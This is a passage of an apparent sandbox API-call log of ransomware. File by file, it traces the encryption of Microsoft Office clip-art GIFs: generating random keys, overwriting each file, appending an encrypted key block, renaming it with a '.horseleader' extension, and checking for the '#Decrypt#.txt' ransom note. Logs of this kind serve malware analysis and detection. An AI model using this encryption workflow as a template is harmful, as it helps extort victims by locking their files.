lpNewFilePointer=0xffffffff) returned 1 [0252.447] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1485, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1485, lpOverlapped=0x0) returned 1 [0252.447] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.447] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.447] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.448] CloseHandle (hObject=0x158) returned 1 [0252.448] GetProcessHeap () returned 0x780000 [0252.448] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.448] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.horseleader") returned 79 [0252.448] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif.horseleader")) returned 1 [0252.448] GetProcessHeap () returned 0x780000 [0252.449] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.449] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9b28600, ftCreationTime.dwHighDateTime=0x1bd50ae, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf9b28600, ftLastWriteTime.dwHighDateTime=0x1bd50ae, nFileSizeHigh=0x0, nFileSizeLow=0xa24, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00135_.GIF", cAlternateFileName="")) returned 1 [0252.449] lstrcmpiW (lpString1="AG00135_.GIF", lpString2="Windows") returned -1 [0252.449] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 67 [0252.449] StrStrIW (lpFirst="AG00135_.GIF", lpSrch=".horseleader") returned 0x0 [0252.449] lstrcmpW (lpString1="AG00135_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.449] lstrcmpW (lpString1="AG00135_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.449] lstrlenW (lpString=".testttjffg") returned 11 [0252.449] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.449] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.449] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.449] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.453] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 67 [0252.453] StrStrW (lpFirst="AG00135_.GIF", lpSrch=".txt") returned 0x0 [0252.453] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2596) returned 1 [0252.453] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xa24, lpOverlapped=0x0) returned 1 [0252.455] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff5dc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.455] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xa24, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xa24, lpOverlapped=0x0) returned 1 [0252.456] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.456] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.456] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.456] CloseHandle (hObject=0x158) returned 1 [0252.456] GetProcessHeap () returned 0x780000 [0252.456] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.456] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.horseleader") returned 79 [0252.456] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif.horseleader")) returned 1 [0252.457] GetProcessHeap () returned 0x780000 [0252.458] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.458] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3bca500, ftCreationTime.dwHighDateTime=0x1bd50ae, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3bca500, ftLastWriteTime.dwHighDateTime=0x1bd50ae, nFileSizeHigh=0x0, nFileSizeLow=0x296f, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00139_.GIF", cAlternateFileName="")) returned 1 [0252.458] lstrcmpiW (lpString1="AG00139_.GIF", lpString2="Windows") returned -1 [0252.458] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 67 [0252.458] StrStrIW (lpFirst="AG00139_.GIF", lpSrch=".horseleader") returned 0x0 [0252.458] lstrcmpW (lpString1="AG00139_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.458] lstrcmpW (lpString1="AG00139_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.458] lstrlenW (lpString=".testttjffg") returned 11 [0252.458] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.458] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.459] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.459] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.460] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 67 [0252.460] StrStrW (lpFirst="AG00139_.GIF", lpSrch=".txt") returned 0x0 [0252.460] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=10607) returned 1 [0252.461] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x296f, lpOverlapped=0x0) returned 1 [0252.463] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd691, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.464] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x296f, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x296f, lpOverlapped=0x0) returned 1 [0252.464] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.464] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.464] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.464] CloseHandle (hObject=0x158) returned 1 [0252.465] GetProcessHeap () returned 0x780000 [0252.465] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.465] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.horseleader") returned 79 [0252.465] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif.horseleader")) returned 1 [0252.467] GetProcessHeap () returned 0x780000 [0252.467] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.467] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedc6c400, ftCreationTime.dwHighDateTime=0x1bd50ae, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xedc6c400, ftLastWriteTime.dwHighDateTime=0x1bd50ae, nFileSizeHigh=0x0, nFileSizeLow=0x3bcc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00142_.GIF", cAlternateFileName="")) returned 1 [0252.467] lstrcmpiW (lpString1="AG00142_.GIF", lpString2="Windows") returned -1 [0252.467] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 67 [0252.467] StrStrIW (lpFirst="AG00142_.GIF", lpSrch=".horseleader") returned 0x0 [0252.467] lstrcmpW (lpString1="AG00142_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.467] lstrcmpW (lpString1="AG00142_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.467] lstrlenW (lpString=".testttjffg") returned 11 [0252.467] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.467] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.468] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.468] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.468] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 67 [0252.468] StrStrW (lpFirst="AG00142_.GIF", lpSrch=".txt") returned 0x0 [0252.469] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=15308) returned 1 [0252.469] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3bcc, lpOverlapped=0x0) returned 1 [0252.471] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc434, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.471] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3bcc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3bcc, lpOverlapped=0x0) returned 1 [0252.472] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.472] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.472] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.472] CloseHandle (hObject=0x158) returned 1 [0252.473] GetProcessHeap () returned 0x780000 [0252.473] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.473] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.horseleader") returned 79 [0252.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif.horseleader")) returned 1 [0252.474] GetProcessHeap () returned 0x780000 [0252.474] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.474] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9688900, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb9688900, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x14c3, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00154_.GIF", cAlternateFileName="")) returned 1 [0252.474] lstrcmpiW (lpString1="AG00154_.GIF", lpString2="Windows") returned -1 [0252.474] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 67 [0252.475] StrStrIW (lpFirst="AG00154_.GIF", lpSrch=".horseleader") returned 0x0 [0252.475] lstrcmpW (lpString1="AG00154_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.475] lstrcmpW (lpString1="AG00154_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.475] lstrlenW (lpString=".testttjffg") returned 11 [0252.475] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.475] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.475] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.475] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.476] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 67 [0252.476] StrStrW (lpFirst="AG00154_.GIF", lpSrch=".txt") returned 0x0 [0252.476] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5315) returned 1 [0252.476] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x14c3, lpOverlapped=0x0) returned 1 [0252.479] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeb3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.479] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x14c3, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x14c3, lpOverlapped=0x0) returned 1 [0252.479] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.480] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.480] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.480] CloseHandle (hObject=0x158) returned 1 [0252.480] GetProcessHeap () returned 0x780000 [0252.480] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.481] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.horseleader") returned 79 [0252.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif.horseleader")) returned 1 [0252.482] GetProcessHeap () returned 0x780000 [0252.482] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.482] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2417b00, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb2417b00, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00157_.GIF", cAlternateFileName="")) returned 1 [0252.482] lstrcmpiW (lpString1="AG00157_.GIF", lpString2="Windows") returned -1 [0252.482] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 67 [0252.482] StrStrIW (lpFirst="AG00157_.GIF", lpSrch=".horseleader") returned 0x0 [0252.482] lstrcmpW (lpString1="AG00157_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.482] lstrcmpW (lpString1="AG00157_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.482] lstrlenW (lpString=".testttjffg") returned 11 [0252.483] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.483] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.483] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.483] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.483] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 67 [0252.484] StrStrW (lpFirst="AG00157_.GIF", lpSrch=".txt") returned 0x0 [0252.484] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4955) returned 1 [0252.484] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x135b, lpOverlapped=0x0) returned 1 [0252.486] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeca5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.486] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x135b, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x135b, lpOverlapped=0x0) returned 1 [0252.487] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.487] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.487] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.487] CloseHandle (hObject=0x158) returned 1 [0252.488] GetProcessHeap () returned 0x780000 [0252.488] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.488] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.horseleader") returned 79 [0252.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif.horseleader")) returned 1 [0252.489] GetProcessHeap () returned 0x780000 [0252.489] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.489] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad7cc700, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad7cc700, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x13a6, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00158_.GIF", cAlternateFileName="")) returned 1 [0252.489] lstrcmpiW (lpString1="AG00158_.GIF", lpString2="Windows") returned -1 [0252.489] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft 